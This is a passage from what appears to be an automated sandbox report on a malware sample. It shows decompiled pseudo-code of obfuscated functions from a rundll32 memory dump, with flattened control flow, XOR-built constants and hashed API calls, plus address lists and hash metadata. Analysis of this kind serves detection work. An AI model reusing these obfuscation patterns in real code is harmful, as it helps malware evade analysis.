				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E0033912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x353e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E00348F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E0033E249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E003342C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E00348F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                    0x0034473c
                                                                                                                    0x0034473f
                                                                                                                    0x00344749
                                                                                                                    0x00344751
                                                                                                                    0x0034475a
                                                                                                                    0x0034475c
                                                                                                                    0x00344760
                                                                                                                    0x00344768
                                                                                                                    0x00344770
                                                                                                                    0x00344778
                                                                                                                    0x00344780
                                                                                                                    0x00344788
                                                                                                                    0x00344793
                                                                                                                    0x00344798
                                                                                                                    0x0034479e
                                                                                                                    0x003447a3
                                                                                                                    0x003447ab
                                                                                                                    0x003447b8
                                                                                                                    0x003447bb
                                                                                                                    0x003447bf
                                                                                                                    0x003447c7
                                                                                                                    0x003447cf
                                                                                                                    0x003447d7
                                                                                                                    0x003447db
                                                                                                                    0x003447e0
                                                                                                                    0x003447e1
                                                                                                                    0x003447e5
                                                                                                                    0x003447ed
                                                                                                                    0x003447f5
                                                                                                                    0x00344803
                                                                                                                    0x00344807
                                                                                                                    0x0034480f
                                                                                                                    0x0034481c
                                                                                                                    0x00344820
                                                                                                                    0x00344828
                                                                                                                    0x00344830
                                                                                                                    0x00344838
                                                                                                                    0x00344840
                                                                                                                    0x00344848
                                                                                                                    0x00344850
                                                                                                                    0x00344858
                                                                                                                    0x00344862
                                                                                                                    0x00344866
                                                                                                                    0x0034486e
                                                                                                                    0x00344876
                                                                                                                    0x0034487e
                                                                                                                    0x00344886
                                                                                                                    0x0034488e
                                                                                                                    0x0034489b
                                                                                                                    0x0034489f
                                                                                                                    0x003448a7
                                                                                                                    0x003448af
                                                                                                                    0x003448b4
                                                                                                                    0x003448b9
                                                                                                                    0x003448c1
                                                                                                                    0x003448c9
                                                                                                                    0x003448d1
                                                                                                                    0x003448d9
                                                                                                                    0x003448e1
                                                                                                                    0x003448e9
                                                                                                                    0x003448f1
                                                                                                                    0x003448f9
                                                                                                                    0x00344901
                                                                                                                    0x00344909
                                                                                                                    0x00344910
                                                                                                                    0x00344915
                                                                                                                    0x0034491d
                                                                                                                    0x00344925
                                                                                                                    0x0034492d
                                                                                                                    0x00344935
                                                                                                                    0x00344944
                                                                                                                    0x00344947
                                                                                                                    0x0034494b
                                                                                                                    0x00344955
                                                                                                                    0x00344959
                                                                                                                    0x00344961
                                                                                                                    0x00344969
                                                                                                                    0x00344971
                                                                                                                    0x00344976
                                                                                                                    0x0034497e
                                                                                                                    0x0034498e
                                                                                                                    0x00344992
                                                                                                                    0x0034499a
                                                                                                                    0x003449a2
                                                                                                                    0x003449aa
                                                                                                                    0x003449b2
                                                                                                                    0x003449ba
                                                                                                                    0x003449bf
                                                                                                                    0x003449c7
                                                                                                                    0x003449cf
                                                                                                                    0x003449d7
                                                                                                                    0x003449df
                                                                                                                    0x003449eb
                                                                                                                    0x003449ee
                                                                                                                    0x003449f2
                                                                                                                    0x003449f6
                                                                                                                    0x003449fa
                                                                                                                    0x00344a03
                                                                                                                    0x00344a0b
                                                                                                                    0x00344a13
                                                                                                                    0x00344a18
                                                                                                                    0x00344a20
                                                                                                                    0x00344a28
                                                                                                                    0x00344a28
                                                                                                                    0x00344a28
                                                                                                                    0x00344a2b
                                                                                                                    0x00344a3d
                                                                                                                    0x00344b36
                                                                                                                    0x00344b3b
                                                                                                                    0x00344b3d
                                                                                                                    0x00344b42
                                                                                                                    0x00344b44
                                                                                                                    0x00000000
                                                                                                                    0x00344b44
                                                                                                                    0x00344a43
                                                                                                                    0x00344a49
                                                                                                                    0x00344b16
                                                                                                                    0x00000000
                                                                                                                    0x00344a4f
                                                                                                                    0x00344a55
                                                                                                                    0x00344af9
                                                                                                                    0x00344aff
                                                                                                                    0x00344b07
                                                                                                                    0x00344b04
                                                                                                                    0x00344b04
                                                                                                                    0x00344b0c
                                                                                                                    0x00344b0f
                                                                                                                    0x00000000
                                                                                                                    0x00344a5b
                                                                                                                    0x00344a61
                                                                                                                    0x00344aea
                                                                                                                    0x00344aef
                                                                                                                    0x00344af2
                                                                                                                    0x00000000
                                                                                                                    0x00344a63
                                                                                                                    0x00344a65
                                                                                                                    0x00344ab7
                                                                                                                    0x00344abe
                                                                                                                    0x00344ac4
                                                                                                                    0x00344ac7
                                                                                                                    0x00344acc
                                                                                                                    0x00344ace
                                                                                                                    0x00344acf
                                                                                                                    0x00344acf
                                                                                                                    0x00000000
                                                                                                                    0x00344a67
                                                                                                                    0x00344a6d
                                                                                                                    0x00344b71
                                                                                                                    0x00344b77
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00344a73
                                                                                                                    0x00344a8f
                                                                                                                    0x00344a91
                                                                                                                    0x00344a9b
                                                                                                                    0x00344aa0
                                                                                                                    0x00000000
                                                                                                                    0x00344aa0
                                                                                                                    0x00344a6d
                                                                                                                    0x00344a65
                                                                                                                    0x00344a61
                                                                                                                    0x00344a55
                                                                                                                    0x00344a49
                                                                                                                    0x00344b86
                                                                                                                    0x00344b86
                                                                                                                    0x00344b5c
                                                                                                                    0x00344b61
                                                                                                                    0x00344b64
                                                                                                                    0x00344b69
                                                                                                                    0x00344b70
                                                                                                                    0x00000000
                                                                                                                    0x00344b70

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ^T$mU`
                                                                                                                    • API String ID: 0-1245783925
                                                                                                                    • Opcode ID: c5d278409c0667b707bd9570ce98eb9fad4761b6d647dd33dfe43dfb01c1e26f
                                                                                                                    • Instruction ID: 882676c001cbb40a32869b2f6b359805971c413f5befc1d59253e9cc708eca94
                                                                                                                    • Opcode Fuzzy Hash: c5d278409c0667b707bd9570ce98eb9fad4761b6d647dd33dfe43dfb01c1e26f
                                                                                                                    • Instruction Fuzzy Hash: E6B132715093409FC359CF25898A51BFBE1FBC4758F108A2DF69A9A260D3B1DA49CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034A666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034A666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E0034DCF7(_v148, 0x331540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E0033A42D(0xab2a8d8a, 0x2b7)))();
								E0033A8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E00340AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E003380E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E00348519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E00337FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E00334816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                    0x0034a666
                                                                                                                    0x0034a666
                                                                                                                    0x0034a670
                                                                                                                    0x0034a674
                                                                                                                    0x0034a67e
                                                                                                                    0x0034a68b
                                                                                                                    0x0034a68f
                                                                                                                    0x0034a694
                                                                                                                    0x0034a699
                                                                                                                    0x0034a6a1
                                                                                                                    0x0034a6a9
                                                                                                                    0x0034a6b1
                                                                                                                    0x0034a6b9
                                                                                                                    0x0034a6c1
                                                                                                                    0x0034a6c6
                                                                                                                    0x0034a6ce
                                                                                                                    0x0034a6d6
                                                                                                                    0x0034a6de
                                                                                                                    0x0034a6e6
                                                                                                                    0x0034a6ea
                                                                                                                    0x0034a6ef
                                                                                                                    0x0034a6f7
                                                                                                                    0x0034a706
                                                                                                                    0x0034a709
                                                                                                                    0x0034a70d
                                                                                                                    0x0034a715
                                                                                                                    0x0034a71d
                                                                                                                    0x0034a722
                                                                                                                    0x0034a732
                                                                                                                    0x0034a736
                                                                                                                    0x0034a73e
                                                                                                                    0x0034a746
                                                                                                                    0x0034a74e
                                                                                                                    0x0034a756
                                                                                                                    0x0034a75e
                                                                                                                    0x0034a766
                                                                                                                    0x0034a76e
                                                                                                                    0x0034a776
                                                                                                                    0x0034a783
                                                                                                                    0x0034a786
                                                                                                                    0x0034a78a
                                                                                                                    0x0034a792
                                                                                                                    0x0034a79a
                                                                                                                    0x0034a7a2
                                                                                                                    0x0034a7aa
                                                                                                                    0x0034a7b2
                                                                                                                    0x0034a7ba
                                                                                                                    0x0034a7c2
                                                                                                                    0x0034a7cf
                                                                                                                    0x0034a7d3
                                                                                                                    0x0034a7db
                                                                                                                    0x0034a7e3
                                                                                                                    0x0034a7eb
                                                                                                                    0x0034a7f3
                                                                                                                    0x0034a7f8
                                                                                                                    0x0034a800
                                                                                                                    0x0034a810
                                                                                                                    0x0034a818
                                                                                                                    0x0034a81b
                                                                                                                    0x0034a81f
                                                                                                                    0x0034a827
                                                                                                                    0x0034a82f
                                                                                                                    0x0034a83c
                                                                                                                    0x0034a842
                                                                                                                    0x0034a847
                                                                                                                    0x0034a84f
                                                                                                                    0x0034a857
                                                                                                                    0x0034a85c
                                                                                                                    0x0034a864
                                                                                                                    0x0034a86c
                                                                                                                    0x0034a874
                                                                                                                    0x0034a879
                                                                                                                    0x0034a881
                                                                                                                    0x0034a890
                                                                                                                    0x0034a891
                                                                                                                    0x0034a895
                                                                                                                    0x0034a89d
                                                                                                                    0x0034a8ab
                                                                                                                    0x0034a8af
                                                                                                                    0x0034a8b3
                                                                                                                    0x0034a8b7
                                                                                                                    0x0034a8bb
                                                                                                                    0x0034a8c3
                                                                                                                    0x0034a8cb
                                                                                                                    0x0034a8cb
                                                                                                                    0x0034a8cb
                                                                                                                    0x0034a8d0
                                                                                                                    0x0034a8d0
                                                                                                                    0x0034a8de
                                                                                                                    0x0034a983
                                                                                                                    0x0034a98c
                                                                                                                    0x0034a994
                                                                                                                    0x0034a99b
                                                                                                                    0x0034a9a7
                                                                                                                    0x0034a9a8
                                                                                                                    0x0034a9a9
                                                                                                                    0x0034a9aa
                                                                                                                    0x0034a9b6
                                                                                                                    0x0034a9c2
                                                                                                                    0x0034a9c7
                                                                                                                    0x00000000
                                                                                                                    0x0034a8e4
                                                                                                                    0x0034a8ea
                                                                                                                    0x0034a952
                                                                                                                    0x0034a957
                                                                                                                    0x0034a95f
                                                                                                                    0x0034a969
                                                                                                                    0x0034a96a
                                                                                                                    0x0034a96b
                                                                                                                    0x0034a96d
                                                                                                                    0x0034a972
                                                                                                                    0x0034a977
                                                                                                                    0x0034a977
                                                                                                                    0x0034a97a
                                                                                                                    0x0034a97a
                                                                                                                    0x00000000
                                                                                                                    0x0034a8ec
                                                                                                                    0x0034a8f2
                                                                                                                    0x0034a93f
                                                                                                                    0x00000000
                                                                                                                    0x0034a8f4
                                                                                                                    0x0034a8fa
                                                                                                                    0x0034aa1d
                                                                                                                    0x0034a900
                                                                                                                    0x0034a906
                                                                                                                    0x00000000
                                                                                                                    0x0034a90c
                                                                                                                    0x0034a910
                                                                                                                    0x0034a91f
                                                                                                                    0x0034a920
                                                                                                                    0x0034a926
                                                                                                                    0x0034a930
                                                                                                                    0x0034a936
                                                                                                                    0x0034a93a
                                                                                                                    0x00000000
                                                                                                                    0x0034a93a
                                                                                                                    0x0034a906
                                                                                                                    0x0034a8fa
                                                                                                                    0x0034a8f2
                                                                                                                    0x0034a8ea
                                                                                                                    0x0034aa26
                                                                                                                    0x0034aa2f
                                                                                                                    0x0034aa2f
                                                                                                                    0x0034a9e8
                                                                                                                    0x0034a9ea
                                                                                                                    0x0034a9ed
                                                                                                                    0x0034a9ef
                                                                                                                    0x0034a9f8
                                                                                                                    0x0034a9fc
                                                                                                                    0x0034aa01
                                                                                                                    0x00000000
                                                                                                                    0x0034a9f1
                                                                                                                    0x0034a9f1
                                                                                                                    0x00000000
                                                                                                                    0x0034a9f1
                                                                                                                    0x00000000
                                                                                                                    0x0034aa06
                                                                                                                    0x0034aa06
                                                                                                                    0x0034aa06
                                                                                                                    0x00000000
                                                                                                                    0x0034aa12

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ^4?$iQ
                                                                                                                    • API String ID: 0-3971506469
                                                                                                                    • Opcode ID: 574dc20f60540f6f86d3e45838bb75ed6693124e246217cd5acafca8c82727ff
                                                                                                                    • Instruction ID: 9da7f52b342153cb7223c630f459346ae2f568dd2da8b5dedd8c097854fd4863
                                                                                                                    • Opcode Fuzzy Hash: 574dc20f60540f6f86d3e45838bb75ed6693124e246217cd5acafca8c82727ff
                                                                                                                    • Instruction Fuzzy Hash: BEA162729083409FC354CF29D58990BFBE1BBC4758F41492DF99AAA260C7B5E949CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00348BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00348BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x353e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E003380E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E0034D25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E00340AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E003380E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E00340AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E003380E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E003380E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                    0x00348be9
                                                                                                                    0x00348bf9
                                                                                                                    0x00348bfa
                                                                                                                    0x00348c01
                                                                                                                    0x00348c04
                                                                                                                    0x00348c05
                                                                                                                    0x00348c06
                                                                                                                    0x00348c0c
                                                                                                                    0x00348c13
                                                                                                                    0x00348c16
                                                                                                                    0x00348c1d
                                                                                                                    0x00348c24
                                                                                                                    0x00348c2b
                                                                                                                    0x00348c32
                                                                                                                    0x00348c40
                                                                                                                    0x00348c47
                                                                                                                    0x00348c4a
                                                                                                                    0x00348c4d
                                                                                                                    0x00348c54
                                                                                                                    0x00348c5b
                                                                                                                    0x00348c69
                                                                                                                    0x00348c6c
                                                                                                                    0x00348c73
                                                                                                                    0x00348c7a
                                                                                                                    0x00348c81
                                                                                                                    0x00348c85
                                                                                                                    0x00348c8c
                                                                                                                    0x00348c93
                                                                                                                    0x00348c9a
                                                                                                                    0x00348c9e
                                                                                                                    0x00348ca5
                                                                                                                    0x00348cac
                                                                                                                    0x00348cb4
                                                                                                                    0x00348cb7
                                                                                                                    0x00348cba
                                                                                                                    0x00348cc1
                                                                                                                    0x00348ccf
                                                                                                                    0x00348cd2
                                                                                                                    0x00348cd9
                                                                                                                    0x00348ce0
                                                                                                                    0x00348ce7
                                                                                                                    0x00348cee
                                                                                                                    0x00348cf5
                                                                                                                    0x00348cff
                                                                                                                    0x00348d02
                                                                                                                    0x00348d05
                                                                                                                    0x00348d0c
                                                                                                                    0x00348d13
                                                                                                                    0x00348d17
                                                                                                                    0x00348d1e
                                                                                                                    0x00348d25
                                                                                                                    0x00348d2c
                                                                                                                    0x00348d33
                                                                                                                    0x00348d3a
                                                                                                                    0x00348d3e
                                                                                                                    0x00348d42
                                                                                                                    0x00348d49
                                                                                                                    0x00348d50
                                                                                                                    0x00348d57
                                                                                                                    0x00348d5b
                                                                                                                    0x00348d64
                                                                                                                    0x00348d6b
                                                                                                                    0x00348d78
                                                                                                                    0x00348d7b
                                                                                                                    0x00348d7e
                                                                                                                    0x00348d85
                                                                                                                    0x00348d93
                                                                                                                    0x00348d96
                                                                                                                    0x00348d9d
                                                                                                                    0x00348da4
                                                                                                                    0x00348dae
                                                                                                                    0x00348db1
                                                                                                                    0x00348db4
                                                                                                                    0x00348dbb
                                                                                                                    0x00348dc2
                                                                                                                    0x00348dc9
                                                                                                                    0x00348dd0
                                                                                                                    0x00348dd7
                                                                                                                    0x00348dde
                                                                                                                    0x00348de5
                                                                                                                    0x00348dec
                                                                                                                    0x00348df7
                                                                                                                    0x00348dfa
                                                                                                                    0x00348e01
                                                                                                                    0x00348e08
                                                                                                                    0x00348e0f
                                                                                                                    0x00348e16
                                                                                                                    0x00348e1a
                                                                                                                    0x00348e1e
                                                                                                                    0x00348e25
                                                                                                                    0x00348e25
                                                                                                                    0x00348e33
                                                                                                                    0x00348ef3
                                                                                                                    0x00348efc
                                                                                                                    0x00348efd
                                                                                                                    0x00348eff
                                                                                                                    0x00348f01
                                                                                                                    0x00348f0b
                                                                                                                    0x00000000
                                                                                                                    0x00348f0b
                                                                                                                    0x00348e3f
                                                                                                                    0x00348e8c
                                                                                                                    0x00348e91
                                                                                                                    0x00000000
                                                                                                                    0x00348e91
                                                                                                                    0x00348e47
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00348e57
                                                                                                                    0x00348e5c
                                                                                                                    0x00348e62
                                                                                                                    0x00348e67
                                                                                                                    0x00348e68
                                                                                                                    0x00348e69
                                                                                                                    0x00348e6b
